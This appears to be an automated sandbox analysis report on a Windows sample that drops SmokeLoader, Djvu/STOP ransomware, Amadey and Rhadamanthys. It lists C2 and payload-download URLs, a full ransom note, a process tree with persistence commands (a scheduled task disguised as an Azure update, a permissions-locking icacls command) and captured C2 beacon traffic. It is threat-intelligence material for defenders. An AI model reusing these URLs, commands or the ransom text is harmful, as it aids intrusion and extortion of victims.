Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-1703_x64
  • resource
    win10-20230220-en
  • resource tags

    arch:x64, arch:x86, image:win10-20230220-en, locale:en-us, os:windows10-1703-x64, system
  • submitted
    19-03-2023 04:07

General

  • Target

    48386627bb56557498183b4a2ebe0ead01561f426cf8672499b8578e3e3a6b89.exe

  • Size

    329KB

  • MD5

    482370bdb5d8d4f02a8cbf7ea6d2f921

  • SHA1

    bc510810fb16d3edfb4e1385fb1de7efee25bd1c

  • SHA256

    48386627bb56557498183b4a2ebe0ead01561f426cf8672499b8578e3e3a6b89

  • SHA512

    f3d234fb588113dbc0bc5e4bd1da310039eba564119706e20d9e71781593767822d11f1431f68cde74dbc4ee742e29e1a769f517674f5ceb382aa6cffc4fc6ad

  • SSDEEP

    3072:CmYli8H1CLQF3upMfss0/cmIESLLFnGVzO6yhpWToU6xRV/t95OMfH:/YrH1CL03u9s05WGJYhsToUWvgMfH

Malware Config

Extracted

Family

smokeloader

Version

2022

C2

http://potunulit.org/

http://hutnilior.net/

http://bulimu55t.net/

http://soryytlic4.net/

http://novanosa5org.org/

http://nuljjjnuli.org/

http://tolilolihul.net/

http://somatoka51hub.net/

http://hujukui3.net/

http://bukubuka1.net/

http://golilopaster.org/

http://newzelannd66.org/

http://otriluyttn.org/

rc4.i32

0xcc4f5fd4

rc4.i32

0x2a68f03e

Extracted

Family

djvu

C2

http://zexeq.com/test2/get.php

http://zexeq.com/lancer/get.php

Attributes
  • extension

    .dapo

  • offline_id

    8EM6M9LqEzIk18qaQ87WiPQ1u84RRdej5V1ovht1

  • payload_url

    http://uaery.top/dl/build2.exe

    http://zexeq.com/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-vbVkogQdu2 Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@freshmail.top Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0667JOsie

rsa_pubkey.plain

Extracted

Family

amadey

Version

3.65

C2

77.73.134.27/8bmdh3Slb2/index.php

Extracted

Family

smokeloader

Botnet

pub1

Extracted

Family

smokeloader

Botnet

sprg

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect rhadamanthys stealer shellcode 3 IoCs
  • Detected Djvu ransomware 18 IoCs
  • Detects PseudoManuscrypt payload 37 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • PseudoManuscrypt

    PseudoManuscrypt is malware resembling Lazarus's Manuscrypt that targets government organizations and ICS.

  • Rhadamanthys

    Rhadamanthys is an info stealer written in C++ first seen in August 2022.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Deletes itself 1 IoCs
  • Executes dropped EXE 39 IoCs
  • Loads dropped DLL 5 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unexpected DNS network traffic destination 1 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 8 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 14 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 26 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 16 IoCs
  • Modifies registry class 64 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 21 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Themes
    1⤵
      PID:1280
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
        PID:2504
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2564
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Browser
          1⤵
          • Suspicious use of SetThreadContext
          • Modifies registry class
          • Suspicious use of AdjustPrivilegeToken
          PID:2396
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k WspService
            2⤵
            • Drops file in System32 directory
            • Checks processor information in registry
            • Modifies data under HKEY_USERS
            • Modifies registry class
            • Suspicious behavior: GetForegroundWindowSpam
            PID:760
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2232
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2216
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1864
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1456
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1376
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1132
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                1⤵
                • Drops file in System32 directory
                • Suspicious use of AdjustPrivilegeToken
                PID:1056
                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                  2⤵
                  • Executes dropped EXE
                  PID:4396
                  • C:\Windows\SysWOW64\schtasks.exe
                    /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                    3⤵
                    • Creates scheduled task(s)
                    PID:1956
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:60
              • C:\Users\Admin\AppData\Local\Temp\48386627bb56557498183b4a2ebe0ead01561f426cf8672499b8578e3e3a6b89.exe
                "C:\Users\Admin\AppData\Local\Temp\48386627bb56557498183b4a2ebe0ead01561f426cf8672499b8578e3e3a6b89.exe"
                1⤵
                • Checks SCSI registry key(s)
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: MapViewOfSection
                PID:1008
              • C:\Users\Admin\AppData\Local\Temp\D892.exe
                C:\Users\Admin\AppData\Local\Temp\D892.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:1528
                • C:\Users\Admin\AppData\Local\Temp\D892.exe
                  C:\Users\Admin\AppData\Local\Temp\D892.exe
                  2⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  PID:2808
                  • C:\Windows\SysWOW64\icacls.exe
                    icacls "C:\Users\Admin\AppData\Local\0b95f0a2-0096-4715-9678-79624e8cd7f9" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                    3⤵
                    • Modifies file permissions
                    PID:1888
                  • C:\Users\Admin\AppData\Local\Temp\D892.exe
                    "C:\Users\Admin\AppData\Local\Temp\D892.exe" --Admin IsNotAutoStart IsNotTask
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:3456
                    • C:\Users\Admin\AppData\Local\Temp\D892.exe
                      "C:\Users\Admin\AppData\Local\Temp\D892.exe" --Admin IsNotAutoStart IsNotTask
                      4⤵
                      • Executes dropped EXE
                      PID:3980
                      • C:\Users\Admin\AppData\Local\20fe431f-5449-4e06-b0a8-65b4780bb245\build2.exe
                        "C:\Users\Admin\AppData\Local\20fe431f-5449-4e06-b0a8-65b4780bb245\build2.exe"
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:3792
                        • C:\Users\Admin\AppData\Local\20fe431f-5449-4e06-b0a8-65b4780bb245\build2.exe
                          "C:\Users\Admin\AppData\Local\20fe431f-5449-4e06-b0a8-65b4780bb245\build2.exe"
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          PID:3468
                      • C:\Users\Admin\AppData\Local\20fe431f-5449-4e06-b0a8-65b4780bb245\build3.exe
                        "C:\Users\Admin\AppData\Local\20fe431f-5449-4e06-b0a8-65b4780bb245\build3.exe"
                        5⤵
                        • Executes dropped EXE
                        PID:4624
                        • C:\Windows\SysWOW64\schtasks.exe
                          /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                          6⤵
                          • Creates scheduled task(s)
                          PID:4312
              • C:\Users\Admin\AppData\Local\Temp\DBEE.exe
                C:\Users\Admin\AppData\Local\Temp\DBEE.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:2292
                • C:\Users\Admin\AppData\Local\Temp\DBEE.exe
                  C:\Users\Admin\AppData\Local\Temp\DBEE.exe
                  2⤵
                  • Executes dropped EXE
                  PID:4648
                  • C:\Users\Admin\AppData\Local\Temp\DBEE.exe
                    "C:\Users\Admin\AppData\Local\Temp\DBEE.exe" --Admin IsNotAutoStart IsNotTask
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:5084
                    • C:\Users\Admin\AppData\Local\Temp\DBEE.exe
                      "C:\Users\Admin\AppData\Local\Temp\DBEE.exe" --Admin IsNotAutoStart IsNotTask
                      4⤵
                      • Executes dropped EXE
                      PID:3928
                      • C:\Users\Admin\AppData\Local\51e619d9-0e91-4064-a350-72fdedb68cce\build2.exe
                        "C:\Users\Admin\AppData\Local\51e619d9-0e91-4064-a350-72fdedb68cce\build2.exe"
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:2192
                        • C:\Users\Admin\AppData\Local\51e619d9-0e91-4064-a350-72fdedb68cce\build2.exe
                          "C:\Users\Admin\AppData\Local\51e619d9-0e91-4064-a350-72fdedb68cce\build2.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:1536
                      • C:\Users\Admin\AppData\Local\51e619d9-0e91-4064-a350-72fdedb68cce\build3.exe
                        "C:\Users\Admin\AppData\Local\51e619d9-0e91-4064-a350-72fdedb68cce\build3.exe"
                        5⤵
                        • Executes dropped EXE
                        PID:708
                        • C:\Windows\SysWOW64\schtasks.exe
                          /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                          6⤵
                          • Creates scheduled task(s)
                          PID:3264
              • C:\Users\Admin\AppData\Local\Temp\ED55.exe
                C:\Users\Admin\AppData\Local\Temp\ED55.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:1472
                • C:\Users\Admin\AppData\Local\Temp\zyy.exe
                  "C:\Users\Admin\AppData\Local\Temp\zyy.exe"
                  2⤵
                  • Executes dropped EXE
                  • Modifies registry class
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:3544
                  • C:\Users\Admin\AppData\Local\Temp\zyy.exe
                    "C:\Users\Admin\AppData\Local\Temp\zyy.exe" -h
                    3⤵
                    • Executes dropped EXE
                    • Modifies registry class
                    • Suspicious use of SetWindowsHookEx
                    PID:4884
                • C:\Users\Admin\AppData\Local\Temp\ss31.exe
                  "C:\Users\Admin\AppData\Local\Temp\ss31.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:2248
                • C:\Users\Admin\AppData\Local\Temp\Player3.exe
                  "C:\Users\Admin\AppData\Local\Temp\Player3.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:4164
              • C:\Users\Admin\AppData\Local\Temp\F053.exe
                C:\Users\Admin\AppData\Local\Temp\F053.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2328
                • C:\Users\Admin\AppData\Local\Temp\zyy.exe
                  "C:\Users\Admin\AppData\Local\Temp\zyy.exe"
                  2⤵
                  • Executes dropped EXE
                  • Modifies registry class
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:3708
                  • C:\Users\Admin\AppData\Local\Temp\zyy.exe
                    "C:\Users\Admin\AppData\Local\Temp\zyy.exe" -h
                    3⤵
                    • Executes dropped EXE
                    • Modifies registry class
                    • Suspicious use of SetWindowsHookEx
                    PID:5012
                • C:\Users\Admin\AppData\Local\Temp\ss31.exe
                  "C:\Users\Admin\AppData\Local\Temp\ss31.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:2576
                • C:\Users\Admin\AppData\Local\Temp\Player3.exe
                  "C:\Users\Admin\AppData\Local\Temp\Player3.exe"
                  2⤵
                  • Executes dropped EXE
                  PID:4132
              • C:\Users\Admin\AppData\Local\Temp\F65F.exe
                C:\Users\Admin\AppData\Local\Temp\F65F.exe
                1⤵
                • Executes dropped EXE
                • Checks SCSI registry key(s)
                • Suspicious behavior: MapViewOfSection
                PID:4776
              • C:\Users\Admin\AppData\Local\Temp\F835.exe
                C:\Users\Admin\AppData\Local\Temp\F835.exe
                1⤵
                • Executes dropped EXE
                PID:3392
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3392 -s 476
                  2⤵
                  • Program crash
                  PID:4984
              • C:\Windows\system32\rundll32.exe
                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
                1⤵
                • Process spawned unexpected child process
                • Suspicious use of WriteProcessMemory
                PID:3400
                • C:\Windows\SysWOW64\rundll32.exe
                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
                  2⤵
                  • Loads dropped DLL
                  • Modifies registry class
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5100
              • C:\Windows\system32\rundll32.exe
                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
                1⤵
                • Process spawned unexpected child process
                • Suspicious use of WriteProcessMemory
                PID:556
                • C:\Windows\SysWOW64\rundll32.exe
                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
                  2⤵
                  • Loads dropped DLL
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4524
              • C:\Users\Admin\AppData\Local\Temp\7C6.exe
                C:\Users\Admin\AppData\Local\Temp\7C6.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:4264
                • C:\Users\Admin\AppData\Local\Temp\7C6.exe
                  C:\Users\Admin\AppData\Local\Temp\7C6.exe
                  2⤵
                  • Executes dropped EXE
                  PID:2644
                  • C:\Users\Admin\AppData\Local\Temp\7C6.exe
                    "C:\Users\Admin\AppData\Local\Temp\7C6.exe" --Admin IsNotAutoStart IsNotTask
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:3264
                    • C:\Users\Admin\AppData\Local\Temp\7C6.exe
                      "C:\Users\Admin\AppData\Local\Temp\7C6.exe" --Admin IsNotAutoStart IsNotTask
                      4⤵
                      • Executes dropped EXE
                      PID:4164
                      • C:\Users\Admin\AppData\Local\a3c9dfac-58d7-4c98-91ca-5cd04cc95d5f\build2.exe
                        "C:\Users\Admin\AppData\Local\a3c9dfac-58d7-4c98-91ca-5cd04cc95d5f\build2.exe"
                        5⤵
                        • Executes dropped EXE
                        • Suspicious use of SetThreadContext
                        PID:1080
                        • C:\Users\Admin\AppData\Local\a3c9dfac-58d7-4c98-91ca-5cd04cc95d5f\build2.exe
                          "C:\Users\Admin\AppData\Local\a3c9dfac-58d7-4c98-91ca-5cd04cc95d5f\build2.exe"
                          6⤵
                          • Executes dropped EXE
                          PID:4108
                      • C:\Users\Admin\AppData\Local\a3c9dfac-58d7-4c98-91ca-5cd04cc95d5f\build3.exe
                        "C:\Users\Admin\AppData\Local\a3c9dfac-58d7-4c98-91ca-5cd04cc95d5f\build3.exe"
                        5⤵
                        • Executes dropped EXE
                        PID:3924
                        • C:\Windows\SysWOW64\schtasks.exe
                          /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                          6⤵
                          • Creates scheduled task(s)
                          PID:3716
              • C:\Users\Admin\AppData\Local\Temp\10DF.exe
                C:\Users\Admin\AppData\Local\Temp\10DF.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • Checks SCSI registry key(s)
                PID:4168
              • C:\Users\Admin\AppData\Local\Temp\147A.exe
                C:\Users\Admin\AppData\Local\Temp\147A.exe
                1⤵
                • Executes dropped EXE
                PID:4412
              • C:\Users\Admin\AppData\Local\Temp\1A67.exe
                C:\Users\Admin\AppData\Local\Temp\1A67.exe
                1⤵
                • Executes dropped EXE
                • Checks SCSI registry key(s)
                • Suspicious behavior: MapViewOfSection
                PID:5088
              • C:\Users\Admin\AppData\Local\Temp\1C2D.exe
                C:\Users\Admin\AppData\Local\Temp\1C2D.exe
                1⤵
                • Executes dropped EXE
                PID:1484
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1484 -s 476
                  2⤵
                  • Program crash
                  PID:4792
              • C:\Users\Admin\AppData\Local\Temp\72E9.exe
                C:\Users\Admin\AppData\Local\Temp\72E9.exe
                1⤵
                • Executes dropped EXE
                PID:5012
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\system32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\Wtoahoepfise.dll,start
                  2⤵
                  • Blocklisted process makes network request
                  • Loads dropped DLL
                  • Suspicious use of SetThreadContext
                  • Checks processor information in registry
                  PID:428
                  • C:\Windows\system32\rundll32.exe
                    "C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61 24140
                    3⤵
                    • Modifies registry class
                    • Suspicious use of FindShellTrayWindow
                    PID:4136
              • C:\Windows\SysWOW64\explorer.exe
                C:\Windows\SysWOW64\explorer.exe
                1⤵
                  PID:3880
                • C:\Windows\explorer.exe
                  C:\Windows\explorer.exe
                  1⤵
                    PID:2140
                  • C:\Windows\SysWOW64\explorer.exe
                    C:\Windows\SysWOW64\explorer.exe
                    1⤵
                      PID:4512
                    • C:\Windows\explorer.exe
                      C:\Windows\explorer.exe
                      1⤵
                        PID:2852
                      • C:\Windows\SysWOW64\explorer.exe
                        C:\Windows\SysWOW64\explorer.exe
                        1⤵
                          PID:4676
                        • C:\Windows\SysWOW64\explorer.exe
                          C:\Windows\SysWOW64\explorer.exe
                          1⤵
                            PID:4788
                          • C:\Windows\SysWOW64\explorer.exe
                            C:\Windows\SysWOW64\explorer.exe
                            1⤵
                              PID:3632
                            • C:\Windows\explorer.exe
                              C:\Windows\explorer.exe
                              1⤵
                                PID:1328
                              • C:\Windows\SysWOW64\explorer.exe
                                C:\Windows\SysWOW64\explorer.exe
                                1⤵
                                  PID:2636
                                • C:\Windows\System32\rundll32.exe
                                  C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                  1⤵
                                    PID:4044

Network

  • flag-us
    DNS
    potunulit.org
    Remote address:
    8.8.8.8:53
    Request
    potunulit.org
    IN A
    Response
    potunulit.org
    IN A
    172.67.181.144
    potunulit.org
    IN A
    104.21.18.99
  • flag-us
    POST
    http://potunulit.org/
    Remote address:
    172.67.181.144:80
    Request
    POST / HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://ocnuavll.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 329
    Host: potunulit.org
    Response
    HTTP/1.1 404 Not Found
    Date: Sun, 19 Mar 2023 04:07:50 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Vr8ut30TH%2B6bEHpnMrhsy6s2QLd5xQ7C0zN0LJI4Hb1jrFXBkHikkpOtWl2cDxAFaYn49nsVfvWOZ6IRfiNd46RyFsp3vXTGLwO6HJ%2FK6Mo8kpCSLSr8zFO7yJVHMzSZ"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 7aa2d9cbbca9b83d-AMS
    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
  • flag-us
    POST
    http://potunulit.org/
    Remote address:
    172.67.181.144:80
    Request
    POST / HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://nckoodola.org/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 250
    Host: potunulit.org
    Response
    HTTP/1.1 404 Not Found
    Date: Sun, 19 Mar 2023 04:07:50 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BnSLkwHtx0jJ6Zrq9FLjiKWfMZ3QMkmmb%2BOGFScJi0GEkSxnbstk5dYb5PCPN1aSIyFWNxU1VtSUyWrDKGPZeaEMndqf9XNYLxTyoIJmD7%2F814BqM%2FpMEG%2F9V3pJ0UfM"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 7aa2d9ccacf8b83d-AMS
    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
  • flag-us
    POST
    http://potunulit.org/
    Remote address:
    172.67.181.144:80
    Request
    POST / HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://yrjbqple.com/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 154
    Host: potunulit.org
    Response
    HTTP/1.1 404 Not Found
    Date: Sun, 19 Mar 2023 04:07:55 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=62YUKo%2BSjamCG4Dh2cbTKVRiRUXq6pV7oz1PthBxE4VvDg3bQciiOecm2Fy0ppE6VGmGZ69JJ%2Bnk8bDc7hpwpjsg0O9aExQDyJajFAiF%2Fl8sOs5gRnKWejOwnmJWWtW6"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 7aa2d9e8ff4ab83d-AMS
    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
  • flag-us
    POST
    http://potunulit.org/
    Remote address:
    172.67.181.144:80
    Request
    POST / HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    Accept: */*
    Referer: http://wouymtw.org/
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Content-Length: 347
    Host: potunulit.org
    Response
    HTTP/1.1 404 Not Found
    Date: Sun, 19 Mar 2023 04:07:55 GMT
    Content-Type: text/html; charset=utf-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=eHN1r9LzXIDfCpGebjUEey684N8ti1NjY%2FBWUTRvJp2EoIe1Xa80lfGGI54U5awCW63FRwyhWhBllJQI4bPYUS0eBZ9du1HDcdYvkhN%2BXKUvfEv7yyYPJkNmVcdSTCkj"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
                                    CF-RAY: 7aa2d9e99f7bb83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://ypktgr.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 164
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:07:55 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=v74hntdElGXSdEUKVJn68IAeYjwrzbTkpg5HhH0es6npWygsCBqKIhlxi63VgJdjlCqQSpQJxKwaNDNZLugLXthkDUoMcXaDEwODTDssBq8bQhGa3BXwPpBE8ocRmkjA"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2d9ea2fb4b83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://kflhin.net/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 367
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:07:55 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=05CDaEniyvNPEywLB7s1k22Aks7JbO42UKmxmRV4%2FpUbLaF1xBEUm3Ro%2FkXZJabWZYs6dZKxxMrR7c1gv8NyMje95tgdg0k7fnbJZY1LsxBcDM2lmHHi2umQ%2BMpUfm4P"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                    Server: cloudflare
                                    CF-RAY: 7aa2d9eabff5b83d-AMS
                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  • flag-us
                                    POST
                                    http://potunulit.org/
                                    Remote address:
                                    172.67.181.144:80
                                    Request
                                    POST / HTTP/1.1
                                    Connection: Keep-Alive
                                    Content-Type: application/x-www-form-urlencoded
                                    Accept: */*
                                    Referer: http://hwcgsfusph.org/
                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                    Content-Length: 326
                                    Host: potunulit.org
                                    Response
                                    HTTP/1.1 404 Not Found
                                    Date: Sun, 19 Mar 2023 04:07:55 GMT
                                    Content-Type: text/html; charset=utf-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    CF-Cache-Status: DYNAMIC
                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=te58kbEovUjH7zWUNWgPzz7V6%2F5LVPmoWzLyDMjV2t3b6u7IbxSPDeAkyS7GOJJahHDk0XOcUg5UdcfwA60tQ%2B9nwExvOoiII7HRtlB%2BbgN%2FzrQOx899S29zYAtlk6iS"}],"group":"cf-nel","max_age":604800}
                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
